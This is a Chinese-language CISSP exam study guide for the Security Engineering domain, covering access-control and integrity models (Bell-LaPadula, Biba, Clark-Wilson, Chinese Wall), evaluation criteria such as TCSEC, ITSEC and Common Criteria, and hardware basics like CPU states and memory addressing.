—53— 第三域 安全工程(管理工程与管理) Chapters 6,7,8,9,10,21 in OSG 7 th Chapters 4,5,7 in AIO 6 th A.利用安全设计原则实施和管理工程过程 所有教程一上来就搞个 V 字模型,没什么意思。重点要搞清楚本章与安全管理、安全运营 这 2 章的关系,以及本章内容与另外 5 章的交叉。这里是关于组织和实施信息系统的安全相关 的工程项目的方法和原则。总的指导思想很简单:系统工程的每一个阶段和环节都要考虑安全。 1.安全成熟度模型 SSE-CMM 描述了一个组织的系统安全工程过程必须包含的基本特征,和软件能力成熟度模型一样, 也分了 5 级。0:初始级;1:可管理级;2:定义级;3:可预测级;4:最佳级。 具体怎么分级的,搞不清楚,反正不考。 2.实现机密性、完整性和可用性可采取的措施 ①限制(Confinement) 软件设计人员使用进程限制约束程序的操作。进程限制允许进程只能在确定的内存地址和 资源中读取和写入数据,也就是常说的沙箱。操作系统或其他一些安全组件不允许非法的读/ 写请求。如果进程试图执行的动作超过了为其授予的权限,那么动作会被拒绝,并且系统将采 取进一步的行动,例如记录违法行为的日志。 ②界限(Bounds)/边界 为进程都分配 1 个授权级别,分级分域管理。在比较简单的系统中,可能只存在两个授权 级别:用户和内核。界限为每个进程划分其使用的内存逻辑区域,不准许其他进程的访问。 ③隔离(Isolation) 通过访问界限对进程进行限制的时候,进程在隔离的状态中运行。进程隔离能够确保任何 行为只影响与隔离进程有关的内存和资源。隔离是一个稳定操作系统的重要组成部分之一。 三者的关系:通过访问界限对进程进行限制的时候,进程在隔离的状态中运行。 3.访问控制 有两种控制:强制访问控制(MAC)和自主访问控制(DAC)。其中,DAC 的主体具有一些 定义访问客体的能力。其实还有非自主的(UDAC)和基于角色的(RBAC)。 4.信任与保证(Trust and Assurance) 保证 Assurance 是满足安全需求的置信度(可信度);保证必须被持续地维持、更新和重 验证。信任可以通过具体的安全功能集成到系统中,而保证是在现实世界对安全功能情况可靠 性和可用性的评估。“保证”这个词在安全评估的各项模型和标准里会多次出现,它其实是指 系统的安全性能到底靠不靠谱,有多大的概率能完成实施和实现?一般用几个等级来表示。 类似的关于评价的概念还有: 认证与认可(certification/accreditation)、 质量控制与质量保障(QC/QA)、 验证与确证(Verification/Validation)。 5.隐蔽通道 Covert Channels —54— 非通信的手段被用于传递信息,就是隐蔽通道。使用隐蔽通道提供了违反、绕过或回避安 全策略而不被发现的一种方法。相应的,公开通道是一种己知的、预期的、被授权的、经过设 计的、受监控的和受控的通信方法。隐蔽通道有 2 种类型: ①计时:时间隐蔽通道通过以一种可预测的方式改变系统组件的性能或更改资源的时间安 排来传达信息。使用时间隐蔽通道通常是一种比较复杂的传送数据的方法,并且难以检测。 ②存储:存储隐蔽通道通过将数据写入一个其他进程可以读到的公共存储区域来传递信 息。当评估软件安全时,需要注重评估任意进程将信息写入到内存中任意位置时,是否可能被 其它的进程读取。 隐蔽通信出现的原因有以下 3 种: ①产品开发过程中的疏忽。 ②软件内实施的访问控制措施不应。 ③两个实体之间存在共享的资源。 B.理解安全模型的基础概念(例如:保密性、完整性、多层模型) 第一域“安全管理”讲了控制框架和威胁建模,都是宏观的,不局限于信息安全业务,是 适用于整个 IT 业务或者生产业务的。第三域“安全工程”也要讲很多的框架和模型,但都是 针对信息系统的,或者信息安全的。 安全模型是指导思想和实施依据。 在信息安全中,模型是对安全策略进行标准化、规范化描述的方法,可以是抽象的,也可 以是具体的。它通过一组显式的规则让信息系统执行和落实安全策略的概念、过程和措施。后 面讲的大部分所谓安全模型,基本上是针对访问控制来的。后面那么多模型的目的和意义其实 并没什么,就是开发一个安全系统时,要参考借鉴这些理论来制定合理的安全目标、需求,采 取合理的综合性的系统架构。“安全策略”描述安全要求是什么,而“安全模型”描述如何把 要求转换成可执行和可审计的技术规范。 主体是请求访问资源的用户或进程;访问是对资源进行读或写操作;客体是被访问的资源。 信任传递:如果 A 信任 B,并且 B 信任 C,那么 A 信任 C。信任传递是一个严重的安全问 题,例如中国的 A 是不能访问外国的 C 的,但是通过 B 翻墙就可以访问 C 了。 封闭系统:小范围、专有的、难集成、高安全。(闭源) 开放系统:大范围、通用的、易集成、易攻击。(开源) 一、安全模式(Security Modes)运行安全模式 美国政府批准和规定的四种可用于分类信息系统的安全模式:专-高-分-多 (1)专用模式 Dedicated Mode 相当于前面讲的单一状态系统。所有用户都级别一样,都有全部权限。 (2)系统调度的/系统高级模式 System High Mode 和专用模式差不多,唯一区别就是用户不是获取有所数据的权限,虽然用户级别一样,都 有授权,但要根据“知其所需”原则,仅被授予部分信息的访问权限。 (3)分隔模式 Compartmented mode 和系统高级模式一样,用户仅被授予部分信息的访问权限。差别在于用户虽然级别一样, —55— 但初始权限不再是一样的,访问权限在给用户授权时就限制死了。而上面那个模式的用户是拥 有全部权限的,只在具体访问数据时,再判断有没有访问的必要和权力。它还有一个机制可以 实现 1 个用户同时处理多个互相隔离的数据,称为分隔模式工作站(CMWs)compartmented mode workstations。 (4)多级模式 Multilevel Mode 这里用户就被分级了,有的用户就没有访问部分数据的级别。 这四个模式很绕,其实一点意义都没有,还要考。列个表吧: 模式/Mode 访问许可 permission 访问需求 need 能否访问 不同级别数据 概括 专用模式 Dedicated 全局权限 不区分 数据不分级 一锅端 系统高级模式 System High 全局权限 区分 不分级,按需访问数据 鸳鸯火锅按需吃 分隔模式 Compartmented 不同权限 区分 数据按权限分级 自助火锅分开吃 多级模式 Multilevel 不同权限 区分 数据分级 不同档次火锅店 除了以上的,还有两种: (5)受控模式 Controlled Mode 在系统的硬件软件上,有更多有限数量的信任被置于多个等级。其结果是,对分类等级和 级别有更多限制。 (6)受限的访问模式 Limited access mode 最小的用户级别并不清晰,最大的数据敏感度并没有根据敏感而分类。 二、要考的安全模型 先基础概念: 1.令牌、功能和标签 Tokens, Capabilities, and Labels Token 安全令牌是一个与资源关联的独立客体,描述其安全属性。(单个,是客体的) Capabilities 功能列表用于存储与多个客体有关的安全信息。(多个,是主体的) label 安全标签是客体附加的永久部分。(不能修改,是客体的) 2.可信计算基 Trusted Computing Base 美国国防部的桔皮书将可信计算基(TCB)描述为硬件、软件和控制方法的组合,这个组合 形成了一个实施安全策略的可信任基准。通常 TCB 组件负责控制对该系统的各种访问,确保系 统的行为在所有的情况下工作正常并遵守安全策略。从某种意义上说,操作系统的内核就是 TCB。如果启用 TCB,那么系统就拥有一条可信路径、一个可信外壳以及系统完整性检查功能。 ①可信路径(trusted path)是用户或程序与内核之间的通信通道。TCB 提供保护资源、以 确保这个通道不会遭受任何方式的危害。 ②可信外壳(trusted shel1)意味着任何在这个外壳中工作的人都无法“逃出去”,其他 进程也无法“闯进来”。 ③安全边界 Security Perimeter(与上一章中的界限 Bounds 概念不同) TCB 与系统的其他部分的逻辑边界,TCB 通过严格可信路径(trusted paths)与外部通信。 可信路径是建立在有着严格标准基础上的通道,它在不受 TCB 安全脆弱性影响的情况下准许进 行必要的通信。 —56— ④引用监控器和内核 Reference Monitors and Kernels TCB 进行访问控制最重要的组件就是引用监控器(Reference Monitor),也称参考监视器, 它是一个抽象机,是主体对客体进行所有访问的中介,不但要确保主体拥有必要的访问权限, 而且还要保护客体不被未授权访问和破坏性更改。为了让系统能够获得更高的信任级别,就必 须要求主体(程序、用户或进程)在访问客体(文件、程序或资源)之前取得完全授权。它处于每 个主体和客体之间,并且在准许访问之前验证主体的访问凭证(令牌、列表、标签)。 ⑤安全内核(security kernel)是使用引用监控器的 TCB 核心组件,是主体访问资源的 中间人,通过可信路径与主体进行通信。安全内核由位于 TCB 内的硬件、软件和固件组件构成, 并且实现和实施引用监控器概念。 3.安全模型 有的模型是概念模型,仅理论描述;有的模型是实际开发运用的,由开发者随便命名;有 的模型是多功能的,是几种类型的混合。 ①关于访问控制的: *访问矩阵 Access Matrix models *访问控制表 Access control matrix *Bell-LaPadula 模型 *Take-Grant 模型 *状态机模型 State machine model,也是很多安全模型的基础 ②关于完整性的: *Biba 模型 *Clark-Wilson 模型 完整性模型有下列 3 个主要的目标: • 防止未授权用户进行更改。 • 防止授权用户进行不正确的更改(职责分离)。 • 维护内部和外部的一致性(格式良好的事务处理)。 Clark-Wilson 实现了以上 3 个目标,Biba 只实现了第 1 个目标。 ③关于信息流的: *信息流模型 Information flow model,也是很多安全模型的基础 *非干扰/非相干模型 Noninterference model/Goguen-Meseguer 模型 *Brewer and Nash 模型(中国墙 Chinese Wall 模型) *组合论 Composition Theories ④基于状态机的: *Bell-LaPadula 模型 *Biba 模型 *Brewer and Nash 模型(中国墙 Chinese Wall 模型) 系统的状态是系统在某一时刻的即时快照。很多活动都会改变这个状态,这称为状态迁移 (state transition)。实现状态机模型的开发人员必须标识所有的初始状态(默认变量值),并 且还要概括说明这些变量如何发生变化(可以接受的输入),以使最终的各种状态(结果值)仍然 —57— 能够确保系统的安全。 ⑤其它: *Sutherland 模型 *Graham-Denning model 模型 *可信计算基 Trusted computing base,是建立大部分安全模型的基础 下面逐个介绍各种模型: 1.访问控制矩阵 Access Control Matrix 访问控制矩阵是一个由主体和客体组成的表,一一对应的表示每个主体对每个客体的操作 权限。表的每一竖列都是一个访问控制列表(ACL),代表 1 个主体可以怎么操作的客体;表 的每一横行都是功能列表/访问能力列表(capabilities list),代表 1 个客体可以被怎么操 作。只有行或者列是不行的,因为要删除一个客体或主体的时候,必须用到行和列才能快速找 出相关联的主体和客体,并作出相应的修改。在基于角色的访问控制系统中,这个矩阵的主体 就是各种角色。 但它没有考虑主体(用户)间的关系,客体(数据)的共享,所以有了“取—予模型”。 2.取—予模型/Take-Grant 模型 Take -Grant 模型(获取-授予)采用有向图/定向关系图(导航图)来表示访问权限如何 在主体中传递的。它有两个规则:具有授权资格的主体可以向另一个主体或客体授予相应的权 限(授予 Grant);具有获得权利的主体可以向另一个主体请求获得受益人权限(获取 Take)。 此外,该模型还可以利用 1 个建立规则(create)和 1 个移除规则(remove)来生成权限和删 除权限。自己可读可写,不管其它的人,是安定型(inert);权限可以申请(取),也能分 配(予),是变换型(transport)。①Grant;②Take;③create;④remove。 这种模型在各种系统的账户管理功能里经常用到,就是管理员可以分配下级用户,下级用 户还可以分配子用户。 3.Bell-LaPadula 模型/BLP 也被称为多级安全系统(multilevel security system),两个专家搞的,美国国防部(DOD) 用的的,为了解决机密性问题,防止信息从高流低。美军的信息分级是三级:非机密(公开)、 机密、秘密以及绝密,前面讲过的。这个模型既是信息流模型,也是状态机模型,也是一种“主 体-客体”模型,每个客体有个安全等级标签,每个主体要验证访问这个客体的权限后,才能 实施相应的访问。它有三个著名的规则: 初级规则①简单安全规则(Simple Security Property)。不能上读(no read up)。 中级规则②*属性(星属性)规则(* Security Property)。不能下写(no write down)。 也被称为约束属性(confinement property) 。 高级规则③强星属性规则(Discretionary Security Property)。主、客体必须同等级 才能读写,通过访问控制矩阵/列表实现。也被称为自主安全属性规则(上级如果要给下级发 文件,因为不能“下写”,所以要自主)。 Bell-LaPadula 只解决机密性问题,不支持完整性和可用性。它还不针对隐蔽通信,不适 应用使用文件共享和服务器的现代系统。它应该和 Biba 模型对比来看。 4.Biba 模型 —58— 两个人为了商业应用,参考 Bell-LaPadula 搞的,主要目的是解决完整性问题,防止信息 从低流高。这个模型既是信息流模型,也是状态机模型,也是一种“主体-客体”模型,每个 客体有个安全等级标签。Biba 也有三大规则: 初级①简单完整性规则(simple integrity property)。不能下读(no readdown)。防止 高级别数据被“污染”。 中级②*完整性规则(star integrity property)。不能上写(no write up)。 高级③引援/调用规则(invocation property)。主体不能请求(调用)完整性级别更高的 主体的服务。 Biba 只解决完整性问题,也解决了调用的问题,不支持机密性和可用性。 它和 Bell-LaPadulap 这两个模型里的 property 翻译成属性、规则、原则、公理都行。“简 单”就是读,“*星”就是写。 5.状态机模型 State machine model 无论处于何种状态,系统总是安全的。这种模型基于有限状态机(FSM)理论: 状态是系统在特定时刻的即时快照,包括各种指标参数; 安全状态是系统的某个状态的所有指标参数都是安全的; 系统的任务操作和变化都用状态转换公式来表示:下一状态=F(输入,当前状态); 所有的状态转换必须进行评估,如果系统的每一个状态都是安全的,系统被称为安全状态 机(secure state machine)。 6.格子型访问控制 Lattice-Based Access Control 这里插播 1 个访问控制模型,本章讲的安全模型,绝大部分其实就是访问控制模型,这个 格子模型也会被考到。格子型访问控制属于非自主访问控制(UDAC),不也就是说可以是强制 (MAC)、也可以是角色(RBAC),反正就不是自主(DAC)。格子型也是信息流模型,主要解 决机密性问题。 Bell-LaPadula 就是基于强制(MAC)和格子。 这个格子就是指定 1 个主体所拥有权限的二维坐标 (经纬度模型);它不是一个坐标点,而是一个格 子型的坐标面,这样主体能访问什么级别的数据很 清楚了,高的低的都不能访问。(高不成低不就) 7. Clark-Wilson 模型 另一种用于商业的优秀模型,实现数据的完整性。其实就是 B/S 架构里的三层模型,有个 中间件来实施访问控制。最重要的就是起“中间件”作用的 TP。先搞清几个术语和过程: ①用户 Users:活动个体 Active agents,也就是主体(数据项是客体); ②转换过程(TP)Transformation Procedure:读、写、改操作,允许更改 CDI 的唯一过程; ③约束数据项(CDI) constrained data item:由 TP 控制,完整性被保护的任何数据项; ④非约束数据项(UDI) unconstrained data item:不受 TP 控制,用户直接操作的,完整 性不被保护的任何数据项; ⑤完整性验证过程(IVP) verification and validation procedures:检查 CDI,确认其 完整性的过程。 主体等级分类 客 体 密 级 分 类 权限格子 —59— ⑥受限接口模型(restricted interface model):基于对主体、客体的分类,限制主体 仅有用特定的访问授权。 Clark-Wilson 完整性模型的关键原理就是:通过 TP 限制对 CDI 的访问,即用户不能直接 操作数据,必须通过身份验证后,根据授权通过 TP 来操作数据。该模型也要使用安全标签来 授予对客体的访问权限,但只能通过 TP 过程和受限接口模型来完成。这种使用 TP 来操作 CDI 的机制也被称为格式良好的处理(well-formed transaction),它也实现了职责分离。 于是,这个模型中要实现一个成功的数据访问或修改,需要满足 3 个条件,所谓的访问三 元组(access triple): ①主体(Users)、②程序/过程(TP)、③客体(CDI)。 而且,优秀的完整性模型必须实现 3 个目标: ①防止未授权的更改; ②防止授权用户的不正当更改(职责分离); ③保持内、外部数据的一致性(格式良好的事务处理)。 前面的 Biba 模型只实现了第一个目标。所以,银行肯定普遍运用了 Clark-Wilson 模型, 它通过使用访问三元组(主体、软件(TP)、客体)、职责分离和审计来实现这 3 个目标。 8.信息流模型 Imformation Flow model 信息流模型以状态机模型为基础,后面的 Bell-LaPadula 和 Biba 模型都是信息梳模型。 信息流的主要目的就是防止失泄密,也就是禁止出现未授权信息流,可以解决隐蔽通道的问题。 当系统“状态”发生转换时,过程中一定有“信息流”的产生。 9.无干扰/无干涉/非相干模型 Noninterference Model/Goguen-Meseguer 模型 先讲讲推理攻击:指挥官在系统里可以看到部队要去俄罗斯打仗,小兵是看不到的,但小 兵看到系统里关于俄罗斯普通信息突然增加了,于是就知道俄罗斯肯定有战事了。 无干扰模型参考借鉴了信息流模型,关注的是高级别主体的动作如何影响系统状态和低级 别主体的,并不关注信息流。也就是说,高级别主体 A 的任何动作必须是无干扰的(不影响别 人,也不受影响,避免出现泄密或隐蔽通信);如果 A 能影响低级别主体 B 的状态(参考状态 机模型),那么 B 处于不安全状态,可能归纳、推导出高级别信息。无干扰模型也可以防止木 马危害。 Goguen-Meseguer 模型是一个完整性模型,没有 Biba 那么出名。它也被称为非干涉模型, 因为它基于非干涉概念理论(noninterference)。GM 无干扰模型就要确保不同密级、不同归 属的数据之间不能有任何的共享、关联和影响。具体怎么实现的,我也不知道。 10. Brewer Nash 模型(中国墙)BN 中国墙也是状态机模型,也是信息流模型。它根据用户的行为动态的进行访问控制,防止 用户访问到会影响其它用户利益的敏感数据。所谓的墙,就是把有利益冲突的数据隔离开来, 不允许同一用户访问,比如:公司的员工虽然有访问所有客户资料的权限,但根据业务记录, 系统只允许他访问自己的客户 A 的资料,不能访问其它员工客户的资料,不然他就会抢别人的 业绩了。 其它不考的模型: 11.组合论 Composition Theories —60— 属于信息流模型,它关注多个系统间的输入/输出信息流(非单个系统)。因为它解释一 个系统的输出如何关联影响另一个系统的输入,所以被称为组合论(集成、关联、组合)。 组合论有三种类型: ①级联(Cascading):一个系统的输入来自另一个系统的输出。(单向流) ②反馈(Feedback):两个系统来回流。(双向流) ③挂接(Hookup):一个系统向另一个系统和外部实体都发送输入。(有出系统的流) 12.Sutherland 模型 Sutherland 模型是一个完整性模型,基于状态机模型和信息流模型,它用来防止隐蔽信 道。该模型定义一组系统状态,只允许产生预定的安全的状态转换,具体的就不知道了。 13.Graham-Denning 模型(可能考) Graham-Denning 模型主要用于删除或创建 1 个主体或客体,它定义了一组基本权限,即 主体能够在客体上执行的一组命令该模型定义的 8 个关于增、删、改权限的基础原则。 14. Lipner 模型(Bell-LaPadula+Biba) Lipner 以一种全新的方式把 Bell-LaPadula 和 Biba 模型的元素与职务功能或角色结合到 一起,可同时保护保密性和完整性。发表于 1982 年的 Lipner 执行文件描述了实现完整性的两 种方法。其中一种使用了 Bell-LaPadula 保密性模型,另种则同时使用了 Bell-LaPadula 模型 和 Biba 完整性模型。这两种方法都给主体和客体分配了安全级别和功能类别。对于主体,这 涉及一个人的许可级别和职务功能(如用户、操作员、应用编程员或系统编程员〕。而对于客 体,则根据其涉密级定义数据或程序及其功能的敏感性(如测试数据、产品数据、应用程序或 系统程序)。Lipner 方法首先把客体划分成数据和程序。当从执行 Clark-Wilson 完整性模型 的角度来看时,这个概念的重要性会体现得淋漓尽致:由于程序允许用户操控数据,对于用户 可以访问的程序以及程序可以操控的客体实施控制,是非常必要的。 三、企业安全架构 ESA 考基本概念。 企业安全架构 ESA,是执行全机构信息安全基础设施的构件。ESA 侧重于为企业制定安全 服务长期战略。它的主要目的是为安全服务开发确定优先重点,同时为信息安全方案计划提供 输入信息。ESA 的重点是设计和执行通用安全服务以及实施受控安全区。这些方法的使用可帮 助确保企业安全服务既有效,又能控制住成本。 ESA 的目标: 实现简单、长期的控制;It represents a simple, long term view of control, 提供统一、规范的控制;it provides a unified vision for common security controls, 基于现有的技术和成本;it leverages existing technology investments, 提供灵活的手段措施以应对当前和长远的威胁,并满足核心功能需求。it provides a flexible approach to current and future threats and also the needs of core functions。 具体相关的企业安全框架、标准和最佳实践在第一域讲了,这里再强调,详细见第 9 域: 1.企业架构 Zachman 表述企业架构基本元素的世界标准。 —61— 2.不同角度的企业安全架构 ①中小企业,要保障业务需求的: 舍伍德应用业务安全架构 SABSA,Sherwood 应用业务安全架构。它是六个层级的框架。 ②从不同部门、角色的角度考虑的: 开放组织架构框架 TOGAF。 ③以软件系统为主要业务的: 软件定性分析系统架构描规范 ISO/IEC/IEEE 42010:2011。 四、安全相关的框架 有 COSO、COBIT、ISO27000、17799、ITIL、ISF 什么的。 C.基于系统安全评估模型选择控制措施和对策 这里讲如何选择安全模型和制定安全措施,也就是系统评估方法,其实是安全系统的各种 评估标准。很多国内教程都有一个演变图: 欧洲的 ITSEC(90) 美国的 TCSEC 桔皮(85 年)=>美国的 FC(91)===>通用准则 CC(95)=>ISO-15408(99) 加拿大的 CTCPEC(90) 1.彩虹系列 TCSEC 美国国防部(DOD)和美国国家计算机安全中心(NCSC)在 80 年代搞的可信计算机系统评估 标准(TCSEC) Trusted Computer System Evaluation Criteria,用不颜色的封面来发布不同 版本的文件。最重要的就是橘皮书。 90 年代,英国等其它欧洲政府和机构在彩虹基础上搞出了信息技术安全评估标准(ITSEC) Information Technology Security Evaluation Criteria。 最后,这 2 个都被通信准则(Common Criteria)取代了。 其实具体行业也有相应的评估标准,如银行业的 PCI–DSS,很多地方会用到。 2.TCSEC 可信计算机系统评估标准 Trusted Computer System Evaluation Criteria 称为橘皮书,在产品评估中引入了可信计算基(TCB)的理念,用于没有联网的单机独立 系统,从 4 个方面评估(安全政策、可控性、保证能力、文档)定义了 4 级 7 类的安全级别: 最低 保护 D 最低保护,Minimal Protection;不满足安全要求 自主 保护 C1 自主安全保护,Discretionary Security Protection;区分用户或用户组 自行管理 C2 受控访问保护,Controlled Access Protection;管理用户的权限、必须 消除介质 强制保护 基于 Bell-LaPadula B1 标签式安全,Labeled Security;主、客体安全标签相符才能访问 B2 结构化保护,Structured Protection;除了安全标签还要职责分离 B3 安全域,Security Domains;职责分离更彻底(有安全管理员)+可信恢复 已验证 保护 A1 验证设计 Verified Design;同 B3,系统开发-使用每个阶段都被评估验证 —62— 彩虹系统都过时了,但还是会考到: 红皮书/可信网络解释 TNI(Trusted Network Interpretation of the TCSEC),用于联 网的系统,有四个级别:None、C1(Minimum) 、C2(Fair) 以及 B2(Good) 。 绿皮书(Department of Defense Password Management Guidelines)国防部密码管理指 导原则,提供了创建和管理密码的指导原则。 TCSEC 之所以被取代了,因为它有以下不足: ①只管访问控制,不管获权后的用户行为;用户如何处理信息?这个问题没有考虑。 ②只管保密,不管数据的准确性、完整性;因为 TCSEC 来源于军方。 ③只管技术,没涉及管理、人员、实施、物理等方面。 ④只管单机,没讲网络。 3.ITSEC 信息技术安全评估标准 Information Technology Security Evaluation Criteria 橘皮书只解决了机密性,ITSEC 则增加了对完整性和可用性的保证。 ITSEC 是欧洲最早的安全评估标准,对系统的安全机制区分功能性和保证性分别进行评 估,被评估的系统称为评估目标(TOE)target of evaluation,TOE 的等级如下: F1-F10 代表安全功能怎么样;E0-E6 代表安全功能被认可的级别(被信任程度)。 ITSEC 与 TCSEC 的差异: ①ITSEC 不止关注机密性,也关注完整性和可用性。 ②ITSEC 不依赖于 TCB 的概念,不要求系统安全组件在 TCB 里被隔离。 ③ITSEC 要求发生任何变化,系统都要重新评估;TCSEC 则不用。 —63— 其中,F(功能性)里 F1 到 F10 对应的功能都在表里(F1-F5 就是 TCSEC 里的 D 到 A)。 那么 E(评估准则),也就是能力水平级别方面,E1 到 E6 是这样的: E1:测试;E2:配置控制和可控的分配; E3:能访问详细设计和源码;E4:详细的脆弱性分析; E5:设计与源码对应;E6:设计与源码在形式上一致。 除了欧美,加拿大也搞了标准:CTCPEC,与 ITSEC 类似,将安全分为功能性需求和保证性 需求两部分。其中,功能性要求分为 4 个大类:①机密性;②完整性;③可用性;④可控性。 级别分为六级:0-5 级。 4.通用准则 Common Criteria 通用准则(CC)是全球性的系统评估标准,定义了测试和确认系统安全能力的各种级别, 被设计用做产品评估模型,对功能性和保证性都进行评估。CC 全面考虑了与信息技术安全性 有关的所有因素,符合 PDR 模型(防护、检听、反应)和现代动态安全概念。ISO 将这个准则 文档命名为 ISO 15408“信息技术安全的评估标准”的官方标准。通用准则的 2 个关键元素: 保护轮廓(PPs) Protection profiles:被评估产品(TOE)的安全需求。(书上翻译的不好, 这个 profiles 其实是指“安全需求规格说明书或概要说明”,AIO 里翻成保护样板了,官方 习题集翻译成保护配置模板) 安全目标(STs) Security targets:安全产品的供应商能提供的安全防护能力水平。 总之,你提供的安全产品(STs)要能满足我的安全需求(PPs),也就是要选择符合通用 准则里相应等级的供应商。家里搞装修买复合板时,可以买欧标 E0 级别的,也可以买 E1 级别 的,只不过 E0 含甲醛更少。 CC 包括 3 部分主要内容,即 ISO/IEC15408 的 3 部分: ①15408-1:入门介绍和通用评估模型,一般性的概念、原则、背景。 ③15408-2:安全功能组件,定义要评估的安全功能要求。 ③15408-3:安全保证组件,定义要评估的安全保证要求。 CC 的 7 个评估保证级别(EALs)evaluation assurance levels CC 含有规格说明“包”,产品要想获得相应的等级,必须满足相应“包”中的规格说明。 这些等级和这些“包”统称为 EAL。 EAL1:功能测试,Functionally tested EAL2:结构测试,Structurally tested EAL3:系统地测试和检查,Methodically tested and checked EAL4:系统地设计、测试和检查,Methodically designed, tested,and reviewed EAL5:半正式的设计和测试,Semi-formally designed and tested EAL5:半正式的验证设计和测试,Semi-formally verified,designed, and tested EAL7:正式的验证设计和测试,Formally verified, designed, and tested 功能结构系统测试系统设计半测半验正式验。(功能结构统统办办证) —64— 通用准则 CC 已经是最优秀的评估标准了,但也有缺点的: ①并不确认用户对数据的处理方式也是安全的。 ②不解决技术以外的管理问题,也不涉及人员、机构和物理方面的安全问题。 ③对加密算法的强度没有明确的等级评定。 5.认证和认可 Certification and Accreditation/认证与鉴定/信息与保证 对安防系统的正式评估过程包括两个阶段:认证和认可。 ①认证:就是通过了技术评估,得到了安全等级证书。 ②认可:就是通过了管理层的调查和审批,确定可以被实施。 认证 Certification 验证 Verification 确证 Validation 认可 Accreditation 维护 Maintenance, 这几个概念经常用到。第一域也提到了信任与保证(Trust and Assurance)。保证Assurance 是满足安全需求的置信度(可信度);保证必须被持续地维持、更新和重验证。信任可以通过 具体的安全功能集成到系统中,而保证是在现实世界对安全功能情况可靠性和可用性的评估。 “保证”这个词在安全评估的各项模型和标准里会多次出现,它其实是指系统的安全性能到底 靠不靠谱,有多大的概率能完成实施和实现?一般用几个等级来表示。类似的关于评价与评估 过程的概念在其它域多次出现,如: *信任与保证(Trust/Assurance); *认证与认可(certification/accreditation); *质量控制与质量保障(QC/QA); *验证与确证(Verification/Validation)。 美国有 2 种标准用于信息系统的认证和认可: ①国防部使用国防部信息技术的安全认证和认可过程 DITSCAP(DOD information technology security certification),将认证认可划成 4 个阶段: 阶段 1:定义 Definition; 阶段 2:认证/验证 Verification; 阶段 3:确证/证实 Validation; 阶段 4:认可/发布 Post Accreditation。 ②国家安全局使用国家信息保障认证和认可过程 NIACAP(national information assurance certification accreditation process),区分了 3 种类型的认可(鉴定)方式。 —65— 对系统的认可:a system accreditation,1 个单一的系统软件; 对站点/场所的认可:a site accreditation,1 个包含整套系统软件的站点; 对类型的认可:a type accreditation,1 个分布式的系统软件。 D.理解信息系统的安全能力(例如:存储保护、虚拟化、可信平台模块、接口、 容错) 其实就是了解各种安全系统所具备的主要功能特性,它实现了什么样的安全防护,有什么 优缺点。 1.内存保护 缓冲区溢出频发,安全架构师必须通过各种技术手段来保持主客体隔离以及各个主体之间 的隔离,其中包括使用处理器状态、分层和数据隐藏等技术。 2.虚拟化 虚拟机通常被隔离在一个沙箱环境中,若是受到感染,可迅速将其移除或关机,用另一台 虚拟机取代。虚拟机对硬件资源拥有有限访问权,因此可帮助保护主机系统和其他虚拟机。 3.可信平台模块(TPM)Trusted Platform Module(TPM=HSM) TPM 是主板的加密处理器芯片,存储和处理密钥,以实现基于硬件加密系统。硬盘离开原 来的系统,是不可能被解密的。TPM 是硬件安全模块(HSM)的一个典型应用。所谓的硬件安全 模块 HSM,是一个用于管理/存储密钥、提高加密速度的硬件设备。许多认证系统使用 HSM 来 存储证书;银行的 ATM 和 POS 终端通常采用专有的 HSM。 4.接口 Interfaces 限制用户的权限一般通过限制应用程序的接口来实现,比如:一个普通用户没有权限,软 件里相关的功能菜单就不会出现。Clark-Wilson 安全模型就运用了接口限制的技术。 5.容错 Fault Tolerance 为了避免单点故障。具体内容在“灾难恢复计划”里。 E.评估与缓解安全架构、设计和解决方案要素的脆弱性 先讲计算机硬件结构与运行原理。要了解软件是怎么在系统中运行的,才知道如何让它安 全地工作。 一、硬件基础/计算机组成 1.CPU 中央处理器(CPU),根据指令执行计算和逻辑操作。操作系统控制 CPU 的语言就是指令集。 CPU 的主要任务有 4 个:提取、解码、执行、存储。 CPU 的运行状态有 4 种(考点): *运行状态 Run or Operating state:执行指令。 *等待状态 Wait stage:等待特定事件完成。 *问题状态/运算状态 Application or Problem stage:执行应用程序(仅非特权指令)。 *特权状态/管理状态 Supervisor state:程序可以访问整个系统,可执行特权指令。 2.存储器 Memory —66— ①只读存储器 ROM(Read-Only Memory)ROM 有好几种: PROM 可编程只读存储器 Programmable Read-Only Memory (PROM),可烧入 1 次,不能改。 EPROM 可擦除可编程只读存储器 Erasable Programmable Read-Only Memory (EPROM),可 用紫外线多次改写。 EEPROM 电可擦除可编程只读存储器 Electronically Erasable Programmable Read-Only Memory (EEPROM),可用直接多次改写。 闪存 Flash Memory,用的太多了,不解释。 ②随机存取存储器 Random Access Memory 就是可读写存储器,掉电则数据无,也有很多种,不介绍了,有动态和静态 2 种: 动态 RAM:基于电容(capacitor),要不断刷新,成本低; 静态 RAM:基于触发器(flip-flop),速度快,成本高。 ③寄存器 Registers CPU 的核心,直接供算术逻辑单元 ALU 使用。 寻址/Memory Addressing 有 5 种方案,会考到的: 1)寄存器寻址 Register Addressing。寄存器是直接安装在 CPU 上的非常小的存储位置。 当 CPU 需要从某个寄存器中获得信息来完成操作时,它可以使用寄存器地址(例如“寄存器 1”) 去访问寄存器的内容。 2)立即寻址 Immediate Addressing(数据和指令在一起,不用寻)。就其本身而言,立 即寻址并不是一个技术上的存储器寻址方案,而是引用某些数据的一种方法,这些数据作为指 令的一部分提供给 CPU 使用。例如:CPU 可能处理命令“将寄存器 l 中的数值与 2 相加”。这 条命令使用两个寻址方案。第一个方案是作为命令一部分的直接寻址,即告诉 CPU 将数值 2 加 进去并且不需要从某个存储器位置中检索该数值。第二个方案是寄存器寻址,即命令 CPU 从寄 存器 1 中取出数值。 3)直接寻址 Direct Addressing(地址和指令在一起,直接寻)。在直接寻址中,要被访 问的存储器位置的实际地址会被提供给 CPU。这个地址必须与正在执行的指令位于相同的存储 页面上。因为与重新编写立即寻址的硬编码数据相比,存储位置的内容能够被更容易地改变, 所以直接寻址比立即寻址更灵活。 4)间接寻址 Indirect Addressing(通过指令里的指针去找地址,再通过地址找数据)。 间接寻址使用的方案类似于直接寻址。但是,作为指令的一部分提供给 CPU 的存储器地址并不 包含 CPU 用为操作数的真实数值。实际上,存储器地址中包含另一个存储器地址(也许位于不 同的页面上)。CPU 通过读取间接地址来了解待操作数据驻留的位置,随后从这个地址中取出 真实的操作数。 5)基址+偏移量寻址 Base+Offset Addressing(基址在寄存器中)。基址+偏移量寻址使 用存储在某个 CPU 寄存器中的数值作为开始计算的基址。然后,CPU 将指令提供的偏移量与基 址相加,并从计算得到的存储位置中取出操作数。 一个 CPU 有几种不同类型的寄存器,存储了需要执行的指令集和数据信息。 